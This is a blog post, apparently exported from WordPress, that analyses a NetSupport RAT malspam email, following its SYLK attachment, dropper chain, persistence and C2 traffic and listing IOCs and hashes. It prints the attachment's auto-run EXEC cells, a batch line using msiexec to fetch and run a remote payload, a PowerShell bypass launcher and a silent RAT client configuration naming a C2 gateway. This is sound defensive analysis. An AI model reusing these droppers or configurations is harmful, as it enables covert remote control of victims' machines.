{"id":1364,"date":"2020-05-29T03:31:40","date_gmt":"2020-05-29T02:31:40","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1364"},"modified":"2022-04-30T22:11:10","modified_gmt":"2022-05-01T03:11:10","slug":"2020-05-27-netwire-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1364","title":{"rendered":"2020-05-27 Netsupport RAT Malspam"},"content":{"rendered":"<p>Summary<br \/>\n========<\/p>\n<p>Yesterday when reviewing the spam filters I found an email with a malicious attachment (.slk file) that setups the system to be infected with what looks to be a NetSupport RAT (based on the information found in the PCAP). I Checked the usual OSINT resources (ie: Hybrid Analysis, Malshare, MalwareBazaar, Anyrun, URLHaus, VT) for the hash of the attachment. Unfortunately there were no hits or results found. The initial link also had no hits yesterday either. The only hit from this malware was for the IP address 207.148.12.140 but that was in the forms of passive DNS results. Using Munin to look at all the captured files that I could get off my VM, I did get some hits as seen in the section labeled &#8220;Munin results.&#8221;<\/p>\n<p>The artifacts for this malware can be found at my Github located <a href=\"http:\/\/github.com\/bloomer1016\/2020-05-27-NetSupport-RAT-malspam\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a>.<\/p>\n<p>Analysis<br \/>\n========<\/p>\n<p>As stated above, the maldoc arrived via email as an attachment. A simple examination of this Excel file gives us some hints about the nature of it and what it was trying to achieve. Using strings on the file I was able to see the initial callout to the first domain (almostkabalnews[.]com\/contact.php) and some other information as well.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nNN;Nauto_open;ER101C1\r\nC;Y76;X1;K&quot;RPens&quot;\r\nF;Y284\r\nC;K33;EEXEC(&quot;cmd.exe \/c EchO| set \/p=&quot;&quot;@echo off&amp;amp;Msie^xec \/ih^tt^p^:^\/\/almostakba&quot;&quot;&amp;gt;%appdata%\\RPens.bat&quot;)\r\nF;Y285\r\nC;K33;EEXEC(&quot;cmd.exe \/c @echo off&amp;amp;ping 1&amp;amp;EcHo|s^et \/p=&quot;&quot;lnews.com\/contact.php ^\/q&quot;&quot;&amp;gt;&amp;gt;%appdata%\\RPens.bat&amp;amp;%appdata%\\RPens.bat&quot;)\r\n\r\n...\r\n\r\nC;K&quot;To display this document you must Enable Content&quot;\r\n<\/pre>\n<p>Based on further analysis and some help from ProcMon, the infection starts with the following command being reconstructed:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\ncmd.exe  \/S \/D \/c&quot; set \/p=&quot;lnews.com\/contact.php ^\/q&quot; 1&amp;gt;&amp;gt;C:\\Users\\Bill\\AppData\\Roaming\\RPens.bat&quot;\r\n<\/pre>\n<p>The contents of the batch file (RPens.bat) that gets dropped into the %APPDATA% folder is:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n@echo off&amp;amp;Msie^xec \/ih^tt^p^:^\/\/almostakbalnews.com\/contact.php ^\/q\r\n<\/pre>\n<p>From here, a MSIEXEC process reaches out to the domain and kicks off the download of the file from that site.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/procmon-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1367\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/procmon-1.png\" alt=\"\" width=\"1152\" height=\"157\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/procmon-2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1368\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/procmon-2.png\" alt=\"\" width=\"1171\" height=\"172\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/download.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1365\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/download.png\" alt=\"\" width=\"1650\" height=\"782\" \/><\/a><\/p>\n<p>Once the MSIEXEC process finished downloading the file, another MSIEXEC process was created and the extraction of a cab file (which is really the file called 1.exe) was written to the filesystem (C:\\Users\\Bill\\AppData\\Local\\Temp\\MW-d31eab32-09d9-4bb5-afca-5821b16e764b\\files\\1.exe). From here, as seen in the image above, the 1.exe file called cmd.exe to create a PoSH script (installations.ps1) via a VBS script (NKYPBRXYDZ.vbs) in the %TEMP% directory. This also manages to delete the VB script as well. The VB script is nothing special as seen here:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nCreaTeObjecT(&quot;WscRipt.SHeLl&quot;).Run &quot;cmd \/c powershell -ep bypass -f C:\\Users\\Bill\\AppData\\Local\\Temp\\installations.ps1&quot;, 0, False \r\n<\/pre>\n<p>The PoSH script on the other hand was interesting. The script was a heavy 5.6MB large with the bulk of the script being in base64 encoding. The entire script can be found here: <a href=\"http:\/\/gist.github.com\/herbiezimmerman\/9871507dae62713f5ae4a50064b7af9c\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/gist.github.com\/herbiezimmerman\/9871507dae62713f5ae4a50064b7af9c<\/a>. In order to deobfuscate the script, all I did was replace the &#8220;Invoke-Expression $NFTOOGKSDU&#8221; statement to &#8220;write-host $NFTOOGKSDU&#8221; and executed that in Powershell ISE. The following is the deobfuscated code of the above script: <a href=\"http:\/\/gist.github.com\/herbiezimmerman\/8f7f8cd71c1da5c8ce19b5ea6c8c7e4c\" target=\"_blank\" rel=\"noopener noreferrer\">http:\/\/gist.github.com\/herbiezimmerman\/8f7f8cd71c1da5c8ce19b5ea6c8c7e4c<\/a>. As seen in that large wall of deobfuscated code, the script reads the data in from base64, decompresses it via gzip, and then wrote it to a file called &#8220;str.txt&#8221; (which I could not find in the ProcMon logs), and then created the files via a byte array in a randomly generated folder name in the %APPDATA% folder. Persistence for this malware was also written into the registry key located at HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run pointing to the file called &#8220;dwm.exe&#8221; in the &#8220;%APPDATA%\\Roaming\\\\&#8221; folder.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/persistence.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1366\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/persistence.png\" alt=\"\" width=\"1212\" height=\"560\" \/><\/a><\/p>\n<p>Once the &#8220;dwm.exe&#8221; process is up and running, it started calling out and is the process responsible for the calls made to the the IPs found above.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/wireshark.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1370\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/wireshark.png\" alt=\"\" width=\"1901\" height=\"263\" \/><\/a><\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/wireshark-1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-1369\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2020\/05\/wireshark-1.png\" alt=\"\" width=\"1666\" height=\"783\" \/><\/a><\/p>\n<p>**NOTE: On another execution of the malware, I noticed that there was a folder called &#8220;NetSupport&#8221; under the &#8220;C:\\Users\\Bill\\AppData\\Local\\&#8221; path. In this folder was another folder called &#8220;NetSupport Manager&#8221; with nothing in it. Looking at the ProcMon results, I did not see this folder being created.<\/p>\n<p><strong>Update &#8211; 2020-05-30:<\/strong> After posting this on <a href=\"http:\/\/twitter.com\/HerbieZimmerman\/status\/1266206796143886336\" target=\"_blank\" rel=\"noopener noreferrer\">Twitter<\/a> and tagging several other researchers, <a href=\"http:\/\/twitter.com\/JAMESWT_MHT\" target=\"_blank\" rel=\"noopener noreferrer\">@JAMESWT_MHT<\/a> brought up something that I failed to outline here in the post &#8211; the file &#8220;client32.ini&#8221; is part of the NetSupport Agent along with some of the other files dropped on to the system. While looking more into the NetSupport application, I came across a <a href=\"http:\/\/kb.netsupportsoftware.com\/knowledge-base\/manually-editing-the-client32u-ini-client32-ini-file\/\" target=\"_blank\" rel=\"noopener noreferrer\">KB article<\/a> talking about the &#8220;client32.ini&#8221; file. From the looks of it this is an older version of the application (pre-v12.50 Clients). For some more information about the settings below, check out the vendor&#8217;s site <a href=\"http:\/\/resources.netsupportsoftware.com\/resources\/manualpdfs\/nsm_manual_uk.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a>. The contents of the &#8220;client32.ini&#8221; file is below:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n0x8f4d8fb4\r\n\r\n&#x5B;Client]\r\n_present=1\r\nAlwaysOnTop=1\r\nDisableChat=1\r\nDisableChatMenu=1\r\nDisableClientConnect=1\r\nDisableCloseApps=0\r\nDisableDisconnect=1\r\nDisableManageServices=0\r\nDisableReplayMenu=1\r\nDisableRequestHelp=1\r\nHideWhenIdle=1\r\nProtocols=3\r\nRoomSpec=Eval\r\nsilent=1\r\nSysTray=0\r\nUnloadMirrorOnDisconnect=1\r\nUsernames=*\r\n\r\n&#x5B;_Info]\r\nFilename=C:\\Program Files\\NetSupport\\NetSupport Manager\\client32.ini\r\n\r\n&#x5B;_License]\r\nquiet=1\r\n\r\n&#x5B;Audio]\r\nDisableAudioFilter=1\r\n\r\n&#x5B;Bridge]\r\nModem=SSTP\r\n\r\n&#x5B;General]\r\nBeepUsingSpeaker=0\r\n\r\n&#x5B;HTTP]\r\nGatewayAddress=calltaxisoftware.com:443\r\n\r\n\r\nGSK=FL;O@OFC:M@KDAGC:I\r\n<\/pre>\n<p>Whois info for the domain &#8220;calltaxisoftware[.]com.&#8221;<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nRegistrant\tWhoisGuard Protected\r\nRegistrant Org\tWhoisGuard, Inc.\r\nRegistrant Country\tpa\r\nRegistrar\tNAMECHEAP INC NameCheap, Inc.\r\nIANA ID: 1068\r\nURL: http:\/\/www.namecheap.com\r\nWhois Server: whois.namecheap.com\r\n\r\n(p)\r\nRegistrar Status\taddPeriod, clientTransferProhibited\r\nDates\t8 days old\r\nCreated on 2020-05-22\r\nExpires on 2021-05-22\r\nUpdated on 0000-12-31\t  \r\nName Servers\tDNS1.REGISTRAR-SERVERS.COM (has 6,044,895 domains)\r\nDNS2.REGISTRAR-SERVERS.COM (has 6,044,895 domains)\r\n  \r\nTech Contact\tWhoisGuard Protected\r\nWhoisGuard, Inc.\r\nP.O. Box 0823-03411,\r\nPanama, Panama, pa\r\n\r\n(p) (f)\r\nIP Address\t88.119.171.110 is hosted on a dedicated server\r\n  \r\nIP Location\tLithuania - Siauliu Apskritis - Siauliai - Informacines Sistemos Ir Technologijos Uab\r\nASN\tLithuania AS61272 IST-AS, LT (registered Dec 12, 2012)\r\nDomain Status\tRegistered And Active Website\r\nIP History\t7 changes on 7 unique IP addresses over 6 years\t  \r\nRegistrar History\t1 registrar with 1 drop\t  \r\nHosting History\t4 changes on 4 unique name servers over 6 years\r\n<\/pre>\n<p>So while the callback is listed as HTTPS (443) it is just plain HTTP and not encrypted traffic as one would expect. Looking at some of the other INI files, it was seen that this looks like it was licensed back on 21\/03\/2018 at 11:54 and that this is licensed to &#8220;EVALUSION&#8221; with what appears to be upwards of 5000 hosts being controlled based on the NSM.lic file (see below). The license for this is &#8220;NSM165348.&#8221;<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n1200\r\n0x3bcb348e\r\n\r\n; NetSupport License File.\r\n; Generated on 11:54 - 21\/03\/2018\r\n\r\n\r\n\r\n&#x5B;&#x5B;Enforce]]\r\n\r\n&#x5B;_License]\r\ncontrol_only=0\r\nexpiry=\r\ninactive=0\r\nlicensee=EVALUSION\r\nmaxslaves=5000\r\nos2=1\r\nproduct=10\r\nserial_no=NSM165348\r\nshrink_wrap=0\r\ntransport=0\r\n<\/pre>\n<p>Looking at the NSM.ini file, this looks to be a generic setup with nothing that stood out to me outside of the &#8220;client=1&#8221; setting.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n\r\n&#x5B;General]\r\nClientParams=\r\nCLIENT32=\r\nInstalldir=\r\nNOARP=\r\nSuppressAudio=\r\n\r\n\r\n&#x5B;Features]\r\nClient=1\r\nConfigurator=\r\nControl=\r\nGateway=\r\nPINServer=\r\nRemoteDeploy=\r\nScripting=\r\nStudent=\r\nTechConsole=\r\nTutor=\r\n\r\n\r\n&#x5B;StartMenuIcons]\r\nClientIcon=\r\nConfigIcon=\r\nControlIcon=\r\nRemoteDeployIcon=\r\nScriptingIcon=\r\nTechConsoleIcon=\r\nTutorIcon=\r\n\r\n\r\n&#x5B;DesktopIcons]\r\nControlDeskIcon=\r\nTechConsoleDeskIcon=\r\nTutorDeskIcon=\r\n\r\n\r\n\r\n\r\n\r\n; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.\r\n\r\n; Client=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          Client=1\r\n;          Controls whether the client component is installed (1) on the target machine or not (Blank)\r\n;\r\n\r\n; CLIENT32=&amp;lt;blank\/not blank&amp;gt;\r\n; e.g.\r\n;\t   CLIENT32=\r\n;\t   Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic\r\n;\r\n\r\n; ClientIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          ClientIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Item &quot;Reset Video Driver&quot;\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; ClientParams=\r\n;\r\n;\t   Advanced users only, please see documentation for advice\r\n;\r\n\r\n; Configurator=&amp;lt;1\/Blank&amp;gt;\r\n; e.g. \r\n;          Configurator=1\r\n;          Controls whether the student client configuration application is installed (1) on the target machine or not (Blank)\r\n;\r\n\r\n; ConfigIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          ConfigIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Items &quot;Manager Configurator&quot; and &quot;School Configurator&quot;\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; Control=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          Control=1\r\n;          Controls whether the control component is installed (1) on the target machine or not (Blank)\r\n;\r\n\r\n; ControlDeskIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          ControlDeskIcon=1\r\n;          Controls whether shortcut icons for the control application (1) is placed on the target machine\u2019s desktop or not (Blank)\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; ControlIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          ControlIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Items &quot;Control&quot; and &quot;Video Player&quot;\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; Gateway=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          Gateway=\r\n;          Controls whether the gateway component is installation on the target machine (1) or not (Blank)\r\n;\r\n\r\n; PINServer=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          PINServer=\r\n;          Controls whether the PINServer component is installation on the target machine (1) or not (Blank)\r\n;\r\n\r\n; Installdir=&amp;lt;driveletter:path&amp;gt;\r\n; e.g. \r\n;          Installdir=e:\\my dir1\\my dir2\\\r\n;\r\n;          Determines the drive and directory where the product will be installed. \r\n;          No quotes are required, normal Windows directory naming restrictions apply.\r\n;\r\n\r\n; NOARP=&amp;lt;1\/Blank&amp;gt;\r\n; e.g. \r\n;          NOARP=1\r\n;\r\n;          Hides the entry in Add\/Remove programs (1), thus preventing uninstall from the Control Panel\r\n;\r\n\r\n; RemoteDeploy=&amp;lt;1\/Blank&amp;gt;\r\n; e.g\r\n;          RemoteDeploy=1\r\n;          Controls whether the remote deployment application is installed on the target machine (1) or not (Blank)\r\n;\r\n\r\n; RemoteDeployIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          RemoteDeployIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Item &quot;Deploy&quot;\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; Scripting=&amp;lt;1\/Blank&amp;gt;\r\n; e.g\r\n;          Scripting=\r\n;          Controls whether the Scripting component is installed (1) or not (Blank)\r\n;\r\n\r\n; ScriptingIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          ScriptingIcon=1\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Items &quot;Script Agent&quot;, &quot;Script Editor&quot; and &quot;Run Script&quot;\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; Student=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          Student=\r\n;          Controls whether the student component is installed (1) on the target machine or not (Blank)\r\n;          Only applicable if the Client component is installed at the same time.\r\n;\r\n\r\n; SuppressAudio=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          SuppressAudio=1\r\n;          Prevents installation of Audio Capture component on Win 2000, XP and 2003\r\n;\r\n\r\n; TechConsole =&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          TechConsole=\r\n;          Controls whether the TechConsole component is installed (1) on the target machine or not (Blank)\r\n;          Only applicable if the Control component is installed at the same time.\r\n;\r\n\r\n; TechConsoleDeskIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          TechConsoleDeskIcon=\r\n;          Controls whether shortcut icons for the school techConsole application (1) is placed on the target machine\u2019s desktop or not (Blank)\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; TechConsoleIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          TechConsoleIcon=\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Item &quot;TechConsole&quot;\r\n;          Only applicable if the relevant component is installed at the same time.\r\n;\r\n\r\n; Tutor =&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          Tutor=\r\n;          Controls whether the Tutor component is installed (1) on the target machine or not (Blank)\r\n;          Only applicable if the Control component is installed at the same time.\r\n;\r\n\r\n; TutorDeskIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          TutorDeskIcon=\r\n;          Controls whether shortcut icons for the school tutor application (1) is placed on the target machine\u2019s desktop or not (Blank)\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n\r\n; TutorIcon=&amp;lt;1\/Blank&amp;gt;\r\n; e.g.\r\n;          TutorIcon=\r\n;          Controls whether shortcut icons are placed on the target machine\u2019s StartMenu or not (Blank)\r\n;\t   This is the StartMenu Items &quot;Annotate&quot;, &quot;Test Designer&quot;, &quot;Power On Machines&quot; and &quot;Tutor&quot;\r\n;          Only applicable if the relevant components are installed at the same time.\r\n;\r\n<\/pre>\n<p>Artifacts<br \/>\n==========<\/p>\n<p>IOCs<br \/>\n&#8212;&#8211;<\/p>\n<p>almostkabalnews[.]com\/contact[.]php &#8211; 207[.]148[.]12[.]140 (TCP)<br \/>\ngeo[.]netsupportsoftware[.]com\/location\/loca[.]asp (TCP) &#8211; 195[.]171[.]92[.]116<br \/>\nPOST http:\/\/88[.]119[.]171[.]110\/fakeurl[.]htm (TCP) &#8211; calltaxisoftware.com (DNS request\/response)<\/p>\n<p>File hashes<br \/>\n&#8212;&#8212;&#8212;&#8212;<\/p>\n<p>3b5824e206c06d3f3a2f081955588d01987de801aed234be5183ec620f0d407f &#8212; NKYPBRXYDZ.vbs<br \/>\nb96e85f9862ef4b4eee656a4fa9dffd577ab7f16370e264de43b5914853b8e0b &#8212; MSIa96e0.LOG<br \/>\n053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae &#8212; nso59B9.tmp\/blowfish.dll<br \/>\nea205cf31b12a1062ebd6b7220b10b8a19229181a32778ec7030d4f1ce74f239 &#8212; 2020-05-27-malspam-attachment.slk<br \/>\n2add4e3f9acd88b53c97989b309bccdf35456c444d7b4436bd0b9b04f1d16cf4 &#8212; installations.ps1<br \/>\n34a4871259f22fea2170acee8d7053886d2802663957cac206d6bba6be54e93d &#8212; MW-98f95b26-4e55-464c-97c7-49d725ed6549\/msiwrapper.ini<br \/>\n5cd1dd897ca53631351db99484b62dd7f35c4a3539298638f4cfea42880c7ec7 &#8212; MW-98f95b26-4e55-464c-97c7-49d725ed6549\/files.cab<br \/>\nc6b8ab9afb68f49a188765fe6bf2a71d2bbc6a53b4cd2d6cd0521f5df5e762a2 &#8212; MW-98f95b26-4e55-464c-97c7-49d725ed6549\/files\/1.exe<br \/>\n9f3cd0c5b9c3fd571e2da5b9feb9f05a7a969aeb77d3c54dfcc0d0226f3d5f9f &#8212; RPens.bat<br \/>\n63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 &#8212; kAP5fmXg\/PCICL32.DLL<br \/>\nedfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 &#8212; kAP5fmXg\/HTCTL32.DLL<br \/>\n60fe386112ad51f40a1ee9e1b15eca802ced174d7055341c491dee06780b3f92 &#8212; kAP5fmXg\/NSM.ini<br \/>\n8ad9c598c1fde52dd2bfced5f953ca0d013b0c65feb5ded73585cfc420c95a95 &#8212; kAP5fmXg\/remcmdstub.exe<br \/>\n49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 &#8212; kAP5fmXg\/dwm.exe<br \/>\n8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 &#8212; kAP5fmXg\/msvcr100.dll<br \/>\n9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 &#8212; kAP5fmXg\/pcicapi.dll<br \/>\n2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12 &#8212; kAP5fmXg\/NSM.lic<br \/>\nd96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 &#8212; kAP5fmXg\/nskbfltr.inf<br \/>\n9cf77e6862951486de61abe93ea66ceb21c807853480febb1cb0656970844be9 &#8212; kAP5fmXg\/client32.ini<br \/>\n313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a &#8212; kAP5fmXg\/PCICHEK.DLL<\/p>\n<p>Machinae results<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/p>\n<p>[.] Requesting http:\/\/www.ipvoid.com\/ip-blacklist-check (POST)<br \/>\n[.] Requesting http:\/\/malc0de.com\/database\/index.php?search=207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/abuseipdb.com\/check\/207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/ransomwaretracker.abuse.ch\/host\/207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/isc.sans.edu\/api\/ip\/207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/freegeoip.io\/json\/207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/www.fortiguard.com\/webfilter?q=207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/ip-address\/report?ip=207.148.12.140&amp;apikey=xxx (GET)<br \/>\n[.] Requesting http:\/\/www.reputationauthority.org\/lookup.php?ip=207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/www.mcafee.com\/threat-intelligence\/ip\/default.aspx?ip=207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/www.threatcrowd.org\/searchApi\/v2\/ip\/report\/?ip=207.148.12.140 (GET)<br \/>\n[.] Requesting http:\/\/www.urlvoid.com\/scan\/almostakbalnews.com (GET)<br \/>\n[.] Requesting http:\/\/www.toolsvoid.com\/unshorten-url (POST)<br \/>\n[.] Requesting http:\/\/malc0de.com\/database\/index.php?search=almostakbalnews.com (GET)<br \/>\n[.] Requesting http:\/\/www.fortiguard.com\/webfilter?q=almostakbalnews.com (GET)<br \/>\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/domain\/report?domain=almostakbalnews.com&amp;apikey=xxx (GET)<br \/>\n[.] Requesting http:\/\/www.reputationauthority.org\/lookup.php?ip=almostakbalnews.com (GET)<br \/>\n[.] Requesting http:\/\/www.mcafee.com\/threat-intelligence\/domain\/default.aspx?domain=almostakbalnews.com (GET)<br \/>\n[.] Requesting http:\/\/www.virustotal.com\/vtapi\/v2\/file\/report?apikey=xxx&amp;resource=ea205cf31b12a1062ebd6b7220b10b8a19229181a32778ec7030d4f1ce74f239 (GET)<br \/>\n********************************************************************************<br \/>\n* Information for 207.148.12.140<br \/>\n* Observable type: ipv4 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. Try running with &#8211;list-sites<\/p>\n<p>[-] No IPVoid Results<br \/>\n[-] No Malc0de Results<br \/>\n[-] No AbuseIPDB Results<br \/>\n[-] No RansomwareTracker Results<br \/>\n[-] No SANS Results<br \/>\n[+] Fortinet Category Results<br \/>\n[-] Fortinet URL Category: Not Rated<br \/>\n[+] VirusTotal pDNS Results<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-05-28&#8217;, &#8216;almostakbalnews[.]com&#8217;)<br \/>\n[-] pDNS malicious URLs from VirusTotal: (&#8216;2020-05-28&#8217;, &#8216;hXXp:\/\/almostakbalnews[.]com\/&#8217;)<br \/>\n[+] Reputation Authority Results<br \/>\n[-] Reputation Authority Score: 50\/100<br \/>\n[-] No McAfee Threat Results<br \/>\n[-] No ThreatCrowd IP Report Results<br \/>\n********************************************************************************<br \/>\n* Information for almostakbalnews.com<br \/>\n* Observable type: fqdn (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. Try running with &#8211;list-sites<\/p>\n<p>[-] No URLVoid Results<br \/>\n[-] No URL Unshorten Results<br \/>\n[-] No Malc0de Results<br \/>\n[+] Fortinet Category Results<br \/>\n[-] Fortinet URL Category: News and Media<br \/>\n[+] VirusTotal pDNS Results<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2019-11-29&#8217;, &#8216;104[.]31.74.118&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2019-11-29&#8217;, &#8216;104[.]31.75.118&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2017-11-28&#8217;, &#8216;144[.]76.148.66&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2016-03-04&#8217;, &#8216;173[.]254.28.63&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-05-23&#8217;, &#8216;192[.]64.119.48&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-05-28&#8217;, &#8216;207[.]148.12.140&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2018-12-23&#8217;, &#8216;5[.]9.217.186&#8217;)<br \/>\n[-] pDNS data from VirusTotal: (&#8216;2020-03-04&#8242;, &#8217;91[.]195.240.94&#8217;)<br \/>\n[-] No Reputation Authority Results<br \/>\n[+] McAfee Threat Results<br \/>\n[-] McAfee Web Risk: Minimal<br \/>\n[-] McAfee Last Seen: 2020-05-27<br \/>\n********************************************************************************<br \/>\n* Information for ea205cf31b12a1062ebd6b7220b10b8a19229181a32778ec7030d4f1ce74f239<br \/>\n* Observable type: hash.sha256 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. Try running with &#8211;list-sites<\/p>\n<p>Munin results<br \/>\n==============<\/p>\n<p>[+] Writing results to new file: check-results_munin.csv<br \/>\n[ ] Processing NKYPBRXYDZ.vbs &#8230;<br \/>\n[ ] Processing msiwrapper.ini &#8230;<br \/>\n[ ] Processing MSIa96e0.LOG &#8230;<br \/>\n[ ] Processing PCICL32.DLL &#8230;<br \/>\n[ ] Processing HTCTL32.DLL &#8230;<br \/>\n[ ] Processing NSM.ini &#8230;<br \/>\n[ ] Processing remcmdstub.exe &#8230;<br \/>\n[ ] Processing dwm.exe &#8230;<br \/>\n[ ] Processing msvcr100.dll &#8230;<br \/>\n[ ] Processing pcicapi.dll &#8230;<br \/>\n[ ] Processing 1.exe &#8230;<br \/>\n[ ] Processing NSM.lic &#8230;<br \/>\n[ ] Processing nskbfltr.inf &#8230;<br \/>\n[ ] Processing installations.ps1 &#8230;<br \/>\n[ ] Processing blowfish.dll &#8230;<br \/>\n[ ] Processing files.cab &#8230;<br \/>\n[ ] Processing client32.ini &#8230;<br \/>\n[ ] Processing RPens.bat &#8230;<br \/>\n[ ] Processing PCICHEK.DLL &#8230;<br \/>\n[+] Processing 19 lines &#8230;<\/p>\n<p>1 \/ 19 &gt; Unknown<br \/>\nHASH: 3b5824e206c06d3f3a2f081955588d01987de801aed234be5183ec620f0d407f COMMENT: NKYPBRXYDZ.vbs<br \/>\nRESULT: &#8211; \/ 